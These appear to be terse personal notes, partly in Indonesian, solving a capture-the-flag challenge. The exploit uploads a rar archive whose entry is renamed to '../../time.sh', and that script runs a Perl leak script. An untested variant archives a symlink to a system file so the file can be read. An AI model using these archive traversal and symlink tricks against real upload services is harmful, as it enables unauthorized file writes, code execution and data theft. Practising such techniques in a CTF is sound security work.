https://medium.com/@noobintheshell/xmasctf-part1-3fb1a38d0601
https://superuser.com/questions/225163/rename-files-in-rar-file-without-extract-it

1. create the payload
$ nano time.sh
=================================
#!/bin/sh

pwd
ls
cat Flagnya_bukan_dimari.txt --> denied
perl ./storage/fd331ec8087045bc/uploads/others/leak.pl
=================================

2. construct the bomb

# step 1 -> cari dimana flagnya

$ rar a evil.rar time.sh
$ rar rn evil.rar time.sh "../../time.sh"

> upload
> go back to '/'
> cari tau session directory nya
> upload perl script (leak.pl)
> get the location of the flag


BISA JUGA (not tested):
# step 2 -> keluar dari rbash, baca file

$ touch /etc/spartan
$ ln -s /etc/spartan symlink.txt
$ rar a -ol more_evil.rar symlink.txt
> upload
> get the flag

storage/<SESSID>/uploads/others/leak.pl
